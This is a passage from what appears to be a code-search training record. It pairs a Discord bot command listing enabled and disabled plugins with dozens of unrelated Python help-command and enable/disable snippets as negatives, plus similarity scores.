em.add_field(name='Group commands',\n value='\\n'.join([f'\\u2022 {x}' for x in cmd_obj.commands]),\n inline=False)\n\n # Add usage last\n em.add_field(name='Usage',\n value=f'```{bot_prefix}\\u200b{cmd_name} '\n f'{\" \".join([f\"<{x}>\" for x in cmd_obj.clean_params])}```',\n inline=False)\n\n await ctx.send(embed=em)", "def show_help():\n print('\\n' + Colors.BLACK_ON_WHITE +\n 'track: Input info for daily tracking' + Colors.NORMAL + '\\n'\n ' * Mood\\n' +\n ' * Short Daily Summary\\n' +\n ' * Accomplishments\\n' +\n ' * Long Journal Entry\\n' +\n \" * Tomorrow's Most Important Task\\n\" +\n '\\n' +\n 'Usage: track.py [options]\\n'\n '\\n' +\n 'Options:\\n' +\n ' [none] Input and record daily tracking\\n' +\n ' y Input and record tracking for previous day\\n' +\n ' ! Print random daily entry\\n' +\n ' accs Print all recent accomplishments\\n' +\n ' help Print this help menu\\n' +\n ' mood Print average mood using past entries\\n' +\n ' overviews Print headers of all recent entries.\\n')", "def do_help(self, message):\r\n\t\tcommands = [command[3:] for command in dir(self) if command.startswith('do_')]\r\n\t\t# self.trace(f'Help: {\", \".join(commands)}')\r\n\r\n\t\tfor command in commands:\r\n\t\t\tmethod = getattr(self, f'do_{command}')\r\n\t\t\tcommand_help = getattr(method, '__doc__')\r\n\t\t\tif command_help:\r\n\t\t\t\tself.trace(f'{command}: {command_help}')", "def get_help(self,command):\n if \"help\" in self.commands[command]:\n return self.commands[command][\"help\"]\n else:\n return \"No help defined for this command.\"", "def HelpCommand(self, unused_args, unused_sub_opts=None, unused_headers=None,\n unused_debug=None):\n self.OutputUsageAndExit()", "def help(update, context):\n update.message.reply_text('Help!')", "def help(update, context):\n update.message.reply_text('Help!')", "def help(update, context):\n update.message.reply_text('Help!')", "def help(update, context):\n update.message.reply_text('Help!')", "def printHelp(self,):\n print man\n return 0", "def help_description():\n pass", "def help(self, cmd=\"\", *, fail=\"\"):\n class_dict = dict(type(self).__dict__)\n # Add this function to class, so that when subclassing,\n # help for help is found\n class_dict.update({\"help\": self.help})\n if cmd.startswith(self.predicate):\n # Strip predicate\n cmd = cmd[len(self.predicate) :]\n # Check that command exists and is not\n # private, protected or special method\n if (not cmd.startswith(\"_\")) and cmd in class_dict.keys():\n item = class_dict[cmd]\n if callable(item):\n if item.__doc__:\n return \"Help on command '{}':\\n. {}\".format(\n cmd, \"\\n. \".join(cleandoc(item.__doc__).split(\"\\n\"))\n )\n return \"No help on command '{}'\".format(cmd)\n # If no cmd given or wrong cmd given, return commands\n commands = []\n for key, value in class_dict.items():\n if not key.startswith(\"_\"):\n if callable(value):\n commands.append(key)\n msg = (\n \"Commands:\\n {}\".format(\", \".join(commands))\n + \"\\n for more help on command, use \"\n + \"{}help command\".format(self.predicate)\n )\n if fail:\n msg = fail + \"\\n\" + msg\n return msg", "def help(self):\n return None", "def help():\n version()\n print(\"USAGE: python3 notes.py [COMMAND]\")\n print(\"COMMAND:\")\n help_dict = {\n \"help\": \"Prints out the help text.\",\n \"version\": \"Prints out the version.\",\n \"init\": \"Initializes a new set of notes.\",\n \"modify\": \"Modify the current set of notes.\",\n }\n help_dict = OrderedDict(sorted(help_dict.items()))\n for entry in help_dict:\n print((\" \" + entry).ljust(10), help_dict[entry])", "async def help(self, msg, *args, intro=None):\n sudo = Guard.allow_sudo(msg)\n if intro is not None:\n intro = f'{intro.strip()} '\n else:\n intro = ''\n if msg.channel.type == discord.ChannelType.private:\n nick = '@DayRInfo'\n else:\n nick = f'@{msg.channel.guild.me.nick}'\n content = f'{intro}I understand the following commands (tag me at the start of the message):\\n'\n for command, (args, desc, enabled, delay) in Controller.commands.items():\n if not sudo and not enabled:\n continue\n if args:\n args = f' {args.strip()}'\n if desc:\n desc = f'\\n\\t{desc}'\n content = f'{content}`{Controller.HELP_KEY}{command}{args}`{desc}\\n'\n content = f'{content}----------\\n'\n content = f'{content}• Also, if you tag this bot ({nick}) on a message containing a link to the interactive Day R map 🗺️ with a location URL, I will send you a snapshot of the location.\\n'\n content = f'{content}• React with ❌ to any of my messages to delete it (if I still remember that it was my message). You can only delete my messages that are directed to you.'\n await msg.author.send(**{\n 'content': content,\n })\n await msg.channel.send(**{\n 'content': 'Command list sent via DM!',\n 'reference': msg.to_reference(),\n 'mention_author': True,\n 'delete_after': 3,\n })", "def print_help_info(self, global_options):\r\n usage = ['',\"Type '%s help <subcommand>' for help on a specific subcommand.\" % self.prog_name,'']\r\n usage.append('Available subcommands:')\r\n commands = self.get_commands(global_options).keys()\r\n commands.sort()\r\n for cmd in commands:\r\n usage.append(' %s' % cmd)\r\n return '\\n'.join(usage)", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Usage: Basic example to make face recognition' +\n 'Just upload foto, pls.')", "def show_help():\n messagebox.showinfo(title='How to Use', message=\"It's really easy.\")", "def helpme(self):\n\n print(\"{}{}{}\".format(' ', 'Commands', ' '))\n print(\"{}{}{}\".format(' ', '--------', ' '))\n print(\"{} {} {}\".format('help ', '|', 'Display all usable commands'))\n print(\"{} {} {}\".format('look ', '|', 'Explore the room to find current location, exits and potential items.'))\n print(\"{} {} {}\".format('go ', '|', 'The prefix required to navigate your player.'))\n print(\"{} {} {}\".format('get ', '|', 'The prefix for picking up items.'))\n print(\"{} {} {}\".format('drop ', '|', 'The prefix for dropping items.'))\n print(\"{} {} {}\".format('inv ', '|', 'Displays the player inventory'))\n print(\"{} {} {}\".format('health ', '|', 'Displays player health'))\n print(\"{} {} {}\".format('eat ', '|', 'Allows the player to use consumables to gain health'))\n print(\"{} {} {}\".format('equip ', '|', 'Equip a weapon in your inventory'))\n print(\"{} {} {}\".format('unequip', '|', 'Unequip a current weapon'))\n print(\"{} {} {}\".format('attack ', '|', 'Allows the player to attack a non-player'))\n print(\"{} {} {}\".format('push ', '|', 'Returns NPC to spawn'))\n print(\"{} {} {}\".format('save ', '|', 'Save current player progress'))\n print(\"{} {} {}\".format('load ', '|', 'Load a previous character'))", "def DoHelp(options, args):\n __pychecker__ = 'unusednames=options'\n if len(args) == 1 and args[0] in COMMAND_USAGE_TEXT:\n print(COMMAND_USAGE_TEXT[args[0]])\n else:\n raise gclient_utils.Error(\"unknown subcommand '%s'; see 'gclient help'\" %\n args[0])", "def help(update, context):\n update.message.reply_text(\"\"\"THESE ARE THE COMMANDS\n /hi\n /gokul\n /bala\n /competition\n /form\n \"\"\")", "async def help(ctx, command:str=None):\n if command == None:\n embed = assemble_embed(\n title=\"Looking for help?\",\n desc=(\"Hey there, I'm a resident bot of Scioly.org!\\n\\n\" +\n \"On Discord, you can send me commands using `!` before the command name, and I will process it to help you! \" +\n \"For example, `!states`, `!events`, and `!fish` are all valid commands that can be used!\\n\\n\" +\n \"If you want to see some commands that you can use on me, just type `!list`! \" +\n \"If you need more help, please feel free to reach out to a staff member!\")\n )\n return await ctx.send(embed=embed)\n hlp = await get_help(ctx, command)\n await ctx.send(embed=hlp)", "def channel_help(message):\n message.reply(Strings['HELP'].format(config.HELP_URL))", "def do_help(self, arg):\n\t\tif arg:\n\t\t\tfuncarg = arg.replace(\" \", \"_\")\n\t\t\ttry:\n\t\t\t\tfunc = getattr(self, 'help_' + funcarg)\n\t\t\texcept AttributeError:\n\t\t\t\ttry:\n\t\t\t\t\tdoc=getattr(self, 'do_' + funcarg).__doc__\n\t\t\t\t\tif doc:\n\t\t\t\t\t\t\tself.stdout.write(\"%s\\n\"%str(doc))\n\t\t\t\t\t\t\treturn\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tpass\n\t\t\t\tself.stdout.write(\"%s\\n\"%str(self.nohelp % (arg,)))\n\t\t\t\treturn\n\t\t\tfunc()\n\t\telse:\n\t\t\tprint \"\\nAvailable commands (type help <topic> for help on topic):\\n\"\n\t\t\tnames = self.get_names()\n\t\t\tfor name in sorted(names):\n\t\t\t\tif name[:3] == \"do_\":\n\t\t\t\t\tname = name[3:]\n\t\t\t\t\tif name == \"EOF\":\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tself.parent.printHelpLine(name, \"\", getattr(self, \"do_\" + name).__doc__ or \"\")\n\t\t\tprint \"\"", "def showHelp(self):\n\t\tfor i in range(0,20):\n\t\t\tprint \"\"\n\t\tprint \" _ _ \"\n\t\tprint \"| | | | \"\n\t\tprint \"| |__ _ __ ___ | |__ \"\n\t\tprint \"| '_ \\ | '_ \\ / __|| '_ \\ \"\n\t\tprint \"| | | || | | |\\__ \\| | | |\"\n\t\tprint \"|_| |_||_| |_||___/|_| |_|\"\n\t\tprint \"A program by Scott Jackson\"\n\t\tprint \"\"\n\t\tprint \"To enter a command, type the key and press Return.\"\n\t\tprint \"NB: parentheses indicate which of two options is the default.\"\n\t\tprint \"\"\n\t\tprint \"Basic Commands:\"\n\t\tprint \"j / k -- show lower-ranked / higher-ranked stories.\"\n\t\tprint \"r -- get the latest stories from Hacker News.\"\n\t\tprint \"q -- quit.\"\n\t\tprint \"# -- open story number # in your web browser.\"\n\t\tprint \"c# -- open comments for story number # in your web browser.\"\n\t\tprint \"#+ -- open up story number # AND its comments in your web browser.\"\n\t\tprint \"top / new -- switch between showing the top and newest stories on HN. (top)\"\n\t\tprint \"c / e -- collapse stories you've already read / don't collapse them. (e)\"\n\t\tprint \"u -- update hnsh to the latest version.\"\n\t\tprint \"==========================\"\n\t\tprint \"For more commands, see the man.txt file.\"\n\t\tinput = raw_input(\"Press Return to go back to the Hacker News stories.\")", "def more_informations():\n print \"--help for more informations.\"\n sys.exit(1)", "def CommandHelp(paser):\n\n\tprint \"\\n===============Commands List===============\\n\"\n\t\t\n\tprint \"NewProject - {}\".format(NewProject.__doc__)\n\tprint \"DelProject - {}\".format(DelProject.__doc__)\n\tprint \"ShareProject - {}\".format(ShareProject.__doc__)\n\tprint \"StopProject - {}\".format(StopProject.__doc__)\n\tprint \"Help - {}\".format(CommandHelp.__doc__)\n\tprint \"Exit - Finaliza la sesion en la terminal.\"", "def help_command(update: Update, context: CallbackContext) -> None:\n commands = [\"/login <pwd>\\n\",\n \"/status\\n\",\n \"/heat\\n\",\n \"/temp\\n\",\n \"/off\\n\",\n \"/help\\n\",\n \"/set\\n\",\n \"/unset\\n\",\n \"/heatmore\\n\",\n \"/lighton\\n\",\n \"/lightoff\\n\"]\n\n cmd: str = \" \".join(commands)\n update.message.reply_text('commands are:\\n' + cmd)", "def help():\n return statement(help_text)" ]
[ "0.84459895", "0.81877965", "0.81058455", "0.8060183", "0.80382925", "0.803564", "0.7979417", "0.79499114", "0.79247713", "0.79205954", "0.7903753", "0.7890884", "0.7862196", "0.78568035", "0.7844785", "0.78190106", "0.78190106", "0.77970946", "0.77970946", "0.7784749", "0.7760896", "0.77318525", "0.77285266", "0.7727433", "0.77265805", "0.7683609", "0.7667311", "0.7646955", "0.7614347", "0.7612728", "0.75966346", "0.7581593", "0.7577692", "0.7577692", "0.7572426", "0.75653255", "0.75653255", "0.75653255", "0.75653255", "0.756396", "0.75449127", "0.75311625", "0.7525225", "0.7519658", "0.7516538", "0.75124586", "0.7504183", "0.74994963", "0.74739295", "0.7470314", "0.74689704", "0.7466509", "0.7462467", "0.74598455", "0.74544287", "0.7453879", "0.74479777", "0.7443314", "0.7441935", "0.7438914", "0.7434473", "0.74256635", "0.7398089", "0.739702", "0.739702", "0.7369509", "0.7364543", "0.7363899", "0.73567545", "0.7345411", "0.7341273", "0.7316813", "0.7313173", "0.73117816", "0.73106086", "0.7300159", "0.7294036", "0.72884285", "0.72884285", "0.72884285", "0.72884285", "0.72780025", "0.7276247", "0.7273482", "0.72729075", "0.7272734", "0.7265219", "0.7261052", "0.72573024", "0.7256481", "0.72552156", "0.72530943", "0.7251562", "0.7244723", "0.72393715", "0.72393614", "0.7233769", "0.7228423", "0.72272223", "0.7217316", "0.7217257" ]
0.0
-1
Red = Disable Blue = Enable Any problem such as plugins on dashboard is enable but show disable here, info Owner
async def plugin(self,ctx): special_case = {"Anime":"myanimelist","Anti Raid":"antiraid"} plugin_setting = await self.redis.hgetall("{}:Config:Cogs".format(ctx.message.guild.id)) embed = discord.Embed() cogs = self.bot.cogs.keys() for x in cogs: setting = u"\U0001F534" #red if x in ("Core", "Remindme", "Tools", "REPL","Events"): # A Owner's thing only. if ctx.message.author.id != self.bot.owner.id: continue setting = u"\U0001F535" #blue if x.lower() in plugin_setting or special_case.get(x) in plugin_setting: setting = u"\U0001F535" #blue embed.add_field(name = x,value = setting) if ctx.message.guild.me.colour.value: embed.colour = ctx.message.guild.me.colour embed.set_footer(text = "{} = Disable | {} = Enable".format(u"\U0001F534",u"\U0001F535")) await ctx.send(embed=embed)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_enabled(self):", "def check_disabled(self):\n return None", "def get_status(self):\n return super(Cabling, self).get_status()", "def enable(self):", "def Enabled(self) -> bool:", "def disable(self):", "def isEnabled(self):", "def disable_feature(self,reason,source=\"gff3_maniger\"):\r\n date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\r\n self.add_history(date,source,reason)\r\n self.active = False\r\n if self._owner_line.type == 'SNP':\r\n self._owner_line._owner_set.all_snp_disabled()", "async def cog_check(self, ctx):\n guild_doc = await db.PLUGINS.find_one({\"_id\": ctx.guild.id})\n\n if guild_doc.get(\"Verification\"):\n return True\n\n else:\n await ctx.send(\n embed=discord.Embed(\n description=(\n f\"{var.E_DISABLE} The Verification plugin\"\n \" is disabled in this server\"\n ),\n color=var.C_ORANGE\n )\n )", "def enable(self) -> None:", "def disable(ctx):\n config_db = ConfigDBConnector()\n config_db.connect()\n config_db.mod_entry(\"NAT_GLOBAL\", \"Values\", {\"admin_mode\": \"disabled\"})", "def disability_specify(self, instance):\r\n return instance.user.profile.disability_specify", "def disable():\n boutonPierre[\"state\"] = \"disabled\"\n boutonFeuille[\"state\"] = \"disabled\"\n boutonCiseaux[\"state\"] = \"disabled\"", "def check_enable_mode(self, *args, **kwargs):\n pass", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def setEnabled(*args):", "def get_everyone_denied(self):", "def enable():\n boutonPierre[\"state\"] = \"normal\"\n boutonFeuille[\"state\"] = \"normal\"\n boutonCiseaux[\"state\"] = \"normal\"", "def disable(self) -> None:", "def disable():\n configdb = ConfigDBConnector()\n configdb.connect()\n rif_info = {}\n rif_info['FLEX_COUNTER_STATUS'] = 'disable'\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"RIF\", rif_info)", "def disabled(name):\n return not enabled(name)", "async def toggle(self, ctx: BBContext):\n\n self.code_enabled = not self.code_enabled\n e = 'enabled.' if self.code_enabled else 'disabled.'\n await ctx.send(f\"Bunker code auto reaction has been : **{e}**\")\n self.bot.logger.info('Bunker code listener %s by %s', e, str(ctx.author))", "def enable(self):\n pass", "def isEnabled(self) -> bool:\n ...", "def _isdisable(self):\n return self.dp.state()==PyTango.DevState.DISABLE", "def can_be_disabled(self) -> bool:\n return True", "async def _antiadv(self, ctx):\r\n serverid = ctx.message.server.id\r\n if ctx.invoked_subcommand is None:\r\n await send_cmd_help(ctx)\r\n if serverid not in self.adkillr:\r\n self.adkillr[serverid] = {'toggle': False, 'message': '{0.mention} don\\'t send links!', 'filters': []}\r\n dataIO.save_json(\"data/adkillr/adkillr.json\", self.adkillr)", "def enableVocolaTakesUnimacroActions(self):\n key = \"VocolaTakesUnimacroActions\"\n self.userregnl.set(key, 1)", "async def admin_disable(self, ctx: commands.Context):\n if ctx.guild.id not in self.guilds:\n await ctx.send('Team management is already disabled in this guild.')\n return\n await self._disable_guild(guild=ctx.guild)\n await ctx.send('Team management disabled.')", "def disable(self):\n pass", "def disable(ctx):\n\n fc_group_cfg = {}\n fc_group_cfg['FLEX_COUNTER_STATUS'] = DISABLE\n ctx.obj.mod_entry(\"FLEX_COUNTER_TABLE\", ACL, fc_group_cfg)", "def disable():\n configdb = ConfigDBConnector()\n configdb.connect()\n tunnel_info = {}\n tunnel_info['FLEX_COUNTER_STATUS'] = DISABLE\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"TUNNEL\", tunnel_info)", "def status():\n with spinner():\n is_enabled = is_witness_enabled()\n signing_key = current_signing_key()\n misses = total_missed()\n\n t = PrettyTable([\"Enabled\", \"Misses\", \"Key\"])\n t.align = \"l\"\n t.add_row([is_enabled, misses, signing_key])\n\n output(t, 'Status')\n output(get_config(), 'Configuration')", "def check_enable_mode(self, check_string='#'):\n return True", "def check_if_enabled(self, user):\n\t\tfrom webnotes.utils import cint\n\t\tif user=='Administrator': return\n\t\tif not cint(webnotes.conn.get_value('Profile', user, 'enabled')):\n\t\t\tself.fail('User disabled or missing')", "def affection_status_switch_on(self):\n self._affection_status_switch = False", "def disable():\n configdb = ConfigDBConnector()\n configdb.connect()\n fc_info = {}\n fc_info['FLEX_COUNTER_STATUS'] = 'disable'\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"QUEUE_WATERMARK\", fc_info)\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"PG_WATERMARK\", fc_info)\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", BUFFER_POOL_WATERMARK, fc_info)", "def disableVocolaTakesUnimacroActions(self):\n key = \"VocolaTakesUnimacroActions\"\n self.userregnl.set(key, 0)", "def enable(ctx):\n\n config_db = ConfigDBConnector()\n config_db.connect()\n config_db.mod_entry(\"NAT_GLOBAL\", \"Values\", {\"admin_mode\": \"enabled\"})", "def organization_enable_status(self) -> str:\n return pulumi.get(self, \"organization_enable_status\")", "def ha_status_icon_should_appear_and_it_should_reflect_that_ha_is_enabled_when_clicked(driver):\n wait_on_element(driver, 0.5, 5, '//button[@ix-auto=\"button__haStatus\"]')\n driver.find_element_by_xpath('//button[@ix-auto=\"button__haStatus\"]').click()\n wait_on_element(driver, 0.5, 5, '//h1[contains(.,\"HA Enabled)]')\n driver.find_element_by_xpath('//span[contains(.,\"HA is enabled\")]')\n driver.find_element_by_xpath('//button[@ix-auto=\"button__CLOSE\"]').click()", "def check_disabled(self):\n if self._treat_counter % 6 != 0:\n return\n if not self.site.logged_in():\n self.site.login()\n page = pywikibot.Page(\n self.site,\n 'User:{username}/shutoff/{class_name}'.format(\n username=self.site.user(), class_name=self.__class__.__name__\n ),\n )\n if page.exists():\n content = page.get(force=True).strip()\n if content:\n e = '{} disabled:\\n{}'.format(self.__class__.__name__, content)\n pywikibot.error(e)\n self.quit()", "def test_verification_status_invisible(self):\r\n self.client.login(username=\"jack\", password=\"test\")\r\n self.check_verification_status_off('verified', 'You\\'re enrolled as a verified student')\r\n self.check_verification_status_off('honor', 'You\\'re enrolled as an honor code student')\r\n self.check_verification_status_off('audit', 'You\\'re auditing this course')", "def setDisabledColor(*args):", "def setDisabledColor(*args):", "def test_get_current_component_status_DISABLED(self):\n self._ucr({\n 'repository/online/component/a': 'no',\n })\n ORIG = UU.FN_UPDATER_APTSOURCES_COMPONENT\n try:\n tmp = NamedTemporaryFile()\n UU.FN_UPDATER_APTSOURCES_COMPONENT = tmp.name\n self.assertEqual(UU.COMPONENT_DISABLED, self.u.get_current_component_status('a'))\n finally:\n UU.FN_UPDATER_APTSOURCES_COMPONENT = ORIG\n tmp.close()", "def get_status():\n return ('off', 'off')", "def toggled_comunication(self):\n if self.actionPC_Monitor.isChecked() and self.actionPC_Monitor.isEnabled():\n self.actionPC_Monitor.setEnabled(0)\n self.actionPC_Sensor_Actuador.setChecked(0)\n self.actionPC_Sensor_Actuador.setEnabled(1)\n self.monitor_environment()\n \n elif self.actionPC_Sensor_Actuador.isChecked() and self.actionPC_Sensor_Actuador.isEnabled():\n self.actionPC_Sensor_Actuador.setEnabled(0)\n self.actionPC_Monitor.setChecked(0)\n self.actionPC_Monitor.setEnabled(1)\n self.actuator_environment()", "def test_listWithDisabled(self):\n self.userbase('create', 'alice', 'localhost', SECRET)\n self.userbase('create', 'bob', 'localhost', SECRET)\n\n def cb(xxx_todo_changeme2):\n (interface, avatar, logout) = xxx_todo_changeme2\n avatar.disabled = 1\n output = self.userbase('list')\n self.assertEqual(output,\n ['alice@localhost', 'bob@localhost [DISABLED]'])\n\n return self._login('bob@localhost', SECRET).addCallback(cb)", "def disableButtons(self):\n self.ui.b_run.setEnabled(False)\n self.ui.b_colour.setEnabled(False)\n self.ui.b_ground_truth.setEnabled(False)\n self.ui.b_vid.setEnabled(False)\n self.ui.b_save.setEnabled(False)\n self.ui.t_low.setEnabled(False)\n self.ui.t_high.setEnabled(False)\n self.ui.t_fps.setEnabled(False)\n self.ui.combo_superpixel.setEnabled(False)\n self.ui.c_super_pixel_video.setEnabled(False)\n self.ui.c_csv.setEnabled(False)\n self.ui.c_draw.setEnabled(False)\n self.ui.c_velocity.setEnabled(False)\n self.ui.c_of.setEnabled(False)\n self.ui.c_back_of.setEnabled(False)\n self.ui.c_depth.setEnabled(False)\n self.ui.c_speed_plot.setEnabled(False)\n self.ui.c_error_plot.setEnabled(False)\n self.ui.c_crash_plot.setEnabled(False)\n self.ui.c_error_plot_video.setEnabled(False)\n self.ui.c_speed_plot_video.setEnabled(False)\n self.ui.c_crash_plot_video.setEnabled(False)\n self.ui.c_optimize.setEnabled(False)\n self.ui.c_object_detection.setEnabled(False)", "async def enable(self, ctx):\n self.bot.db.execute(\"UPDATE starboards SET enabled = 1 WHERE channel_id = ?\", (ctx.channel.id,))\n await ctx.say(\"star.enabled\")", "def _get_enable(self):\n return self.__enable", "def _get_enable(self):\n return self.__enable", "def custom_assess_status_check(self):\n options = self.options\n # can check options.thing to ensure that it makes sense\n # if wrong return 'blocked', \"The driver is badly configured ...\"\n return None, None", "def admin_non_activated(request):\r\n ret = []\r\n res = UserMgr.non_activated_account()\r\n if res:\r\n ret = [u.username for u in res]\r\n\r\n return _api_response(request, {\r\n 'count': len(ret),\r\n 'status': True,\r\n 'data': ret,\r\n })", "def _iotool_enable_yellow_command(self):\n return self._iotool.commands.set_low(self._spconfig.IOTOOL_GREEN_YELLOW_SWITCH_PIN)", "def test_enabled(self):\n # OSA script should have been installed in setUp function, which sets\n # enabled to True by default.\n self.assertTrue(self.run_function(\"assistive.enabled\", [OSA_SCRIPT]))\n # Disable OSA Script\n self.run_function(\"assistive.enable\", [OSA_SCRIPT, False])\n # Assert against new disabled status\n self.assertFalse(self.run_function(\"assistive.enabled\", [OSA_SCRIPT]))", "def styled_status(enabled, bold=True):\n return click.style('Enabled' if enabled else 'Disabled', 'green' if enabled else 'red', bold=bold)", "def enabled(self):\n raise NotImplementedError", "def _disable(self):\n self.enabled = False", "def disable():\n request = dict(id='gbn')\n _gbn_disable(request)", "async def goodbye_toggle(self, ctx, value: bool):\n await queries.update_setting(ctx, \"goodbye_settings\", \"is_enabled\", value)\n if value:\n await util.send_success(ctx, \"Goodbye messages are now **enabled**\")\n else:\n await util.send_success(ctx, \"Goodbye messages are now **disabled**\")", "async def toggle(self, ctx):\r\n serverid = ctx.message.server.id\r\n if self.adkillr[serverid]['toggle'] is True:\r\n self.adkillr[serverid]['toggle'] = False\r\n e = discord.Embed(description='**AntiAdv is now disabled.**')\r\n await self.bot.say(embed=e)\r\n elif self.adkillr[serverid]['toggle'] is False:\r\n self.adkillr[serverid]['toggle'] = True\r\n e = discord.Embed(description='**AntiAdv is now enabled.**')\r\n await self.bot.say(embed=e)\r\n dataIO.save_json(\"data/adkillr/adkillr.json\", self.adkillr)", "def disable(self) -> Awaitable[Dict]:\n return self.client.send(\"Security.disable\", {})", "def __disable__(self) -> None:\n pass", "def disabled_by_microsoft(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"disabled_by_microsoft\")", "def get_id(self):\n return \"always_false_plugin\"", "def disable_dialog_boxes(self):\n self.exec_command('SilentUpdateFW')\n self.exec_command('SuppressInfoUpdateFW')\n self.exec_command('SetBatchMode = 1')\n\n # SuppressControlPanel\n self.exec_command(\"HideDeviceSelection = 1\")\n self.exec_command(\"SuppressControlPanel\")\n # Hide Flash Windows\n self.exec_command(\"DisableInfoWinFlashDL\")\n self.exec_command(\"DisableInfoWinFlashBPs\")", "def enable_btns(self):\n self.saveBtn.setEnabled(True)\n self.openVideoBtn.setEnabled(True)\n self.openAnnotationBtn.setEnabled(True)\n self.resetBtn.setEnabled(True)\n self.speedCombo.setEnabled(True)\n self.newFileBtn.setEnabled(True)\n self.HelpBtn.setEnabled(True)", "def enable(self):\n if not self.labExperiment:\n super().enable()\n else:\n self.connection.command('open_dm', self.DMserial)\n status = self.connection.query('get_status')\n assert status == 0, 'Error connecting to DM. Error: ' + str(status)\n numActProfile = self.connection.query('num_actuators')\n assert numActProfile == self.numActProfile, 'Wrong number of profile actuators entered'\n print(\"'BM1k' is now enabled\")", "def disable(self):\n\t\tresponse = self.client.post(self._endpoint + \"/disable\")\n\t\treturn bool(response.json[\"success\"])", "def test_disable(self):\n self.assertTrue(self.user1.active)\n self.assertFalse(self.user1.ad_deleted)\n url = '/api/users/{}/'.format(self.user1.ad_guid)\n data = {\n 'Enabled': False,\n }\n response = self.client.put(url, json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 202)\n user = DepartmentUser.objects.get(pk=self.user1.pk) # Refresh from db\n self.assertFalse(user.ad_deleted)\n self.assertFalse(user.active)\n self.assertTrue(user.in_sync)", "def change_log_success_status(self, value):\n if value:\n self.embed.colour = 3066993 # Discord color format\n elif value is False:\n self.embed.colour = 15158332\n elif not value:\n self.embed.colour = 15105570", "def add_option_enable(self):\n logger.debug(\"Adding enable option\")\n chkenable = ttk.Checkbutton(self.optsframe,\n variable=self.vars[\"enabled\"],\n text=\"Enable {}\".format(self.tabname),\n command=self.on_chkenable_change)\n chkenable.pack(side=tk.RIGHT, padx=5, anchor=tk.W)\n Tooltip(chkenable,\n text=\"Enable or disable {} display\".format(self.tabname),\n wraplength=200)", "def disable():\n configdb = ConfigDBConnector()\n configdb.connect()\n port_info = {}\n port_info['FLEX_COUNTER_STATUS'] = 'disable'\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", \"PORT\", port_info)", "def test_disabled_feature(self):\r\n user = UserFactory()\r\n staff = AdminFactory()\r\n\r\n # if feature is disabled user can keep reusing same password\r\n self.assertTrue(PasswordHistory.is_allowable_password_reuse(user, \"test\"))\r\n self.assertTrue(PasswordHistory.is_allowable_password_reuse(staff, \"test\"))\r\n\r\n self.assertFalse(PasswordHistory.should_user_reset_password_now(user))\r\n self.assertFalse(PasswordHistory.should_user_reset_password_now(staff))", "def disable_setup(self):\n self.high_ver_entry.config(state=\"disabled\")\n self.low_ver_entry.config(state=\"disabled\")\n self.left_hor_entry.config(state=\"disabled\")\n self.right_hor_entry.config(state=\"disabled\")", "def _iotool_enable_green_command(self):\n return self._iotool.commands.set_high(self._spconfig.IOTOOL_GREEN_YELLOW_SWITCH_PIN)", "def is_enabled(self):\n enabled = self.settings.get('show_status_bar_text', False)\n if self.template and not enabled:\n self.template = None\n self.vars['repo'] = None\n self.erase()\n return enabled", "async def disable(self, ctx):\n\n server = ctx.message.server\n\n settings = self.bot.dota_ticker_settings.get(server.id)\n\n if settings is not None:\n settings['enabled'] = False\n await self.bot.dota_ticker_settings.put(server.id, settings)\n\n await self.bot.say('The match ticker has been disabled on {0.name}.'.format(server))", "def disabled(username):\r\n msg = u\"{0} is a disabled user account\".format(username)\r\n\r\n data = {\r\n 'user': username,\r\n 'component': AuthLog.component\r\n }\r\n\r\n AuthLog.store(Log.INFO, msg, **data)", "def enabled(self):\n return True", "def enabled(self):\n return True", "async def active(self, ctx: commands.Context, toggle: bool = None):\n guild = ctx.guild\n tog = self.config.guild(guild)\n role_config = [\n await tog.temprole(),\n await tog.autoroles(),\n ]\n if not role_config[1]:\n role_config[1] = None\n if toggle is None:\n message = \"The Verification settings is set to {}.\".format(await tog.toggle())\n if role_config.count(None) == 2 and await tog.toggle():\n await tog.toggle.set(False)\n message = (\n \"I have disabled verification since roles instructions has been \"\n \"removed. Check settings for more informations\"\n )\n return await ctx.send(message)\n\n if role_config.count(None) == 2:\n return await ctx.send(\n \"I am missing informations; I don't know if I should either give a temprorary \"\n \"role while verifying or give a role after the verification.\"\n )\n await tog.toggle.set(toggle)\n await ctx.send(\"Verification settings is now set to {choice}.\".format(choice=toggle))", "async def admin_enable(self, ctx: commands.Context):\n if ctx.guild.id in self.guilds:\n await ctx.send('Team management is already enabled in this guild.')\n return\n await self._enable_guild(guild=ctx.guild)\n await ctx.send('Team management enabled.')", "def fact():\n status = \"disabled\"\n pref = CFPreferencesCopyAppValue(\n \"AutomaticCheckEnabled\", \"/Library/Preferences/com.apple.SoftwareUpdate\"\n )\n if pref:\n status = \"enabled\"\n\n return {factoid: status}", "def disable(self): \n self.feed_button.config(state=\"disabled\")\n self.eat_button.config(state=\"disabled\") \n for t in range(self.player.game.trait_limit): \n self.add_trait_buttons[t].config(state=\"disabled\") \n self.add_population_button.config(state=\"disabled\")\n self.add_body_size_button.config(state=\"disabled\")", "def toggle_failed_banner_off(request):\r\n user_id = request.user.id\r\n SoftwareSecurePhotoVerification.display_off(user_id)\r\n return HttpResponse('Success')", "async def toggle(self, ctx):\n guild = ctx.message.guild\n\n enabled = await self.config.guild(guild).enabled()\n\n enabled = not enabled\n await self.config.guild(guild).enabled.set(enabled)\n\n if enabled is True:\n await ctx.send(\"AntiSpam has been enabled\")\n else:\n await ctx.send(\"AntiSpam has been disabled\")", "def _get_admin_status(self):\n return self.__admin_status", "def disable_color(self):\n self.disable_color = True" ]
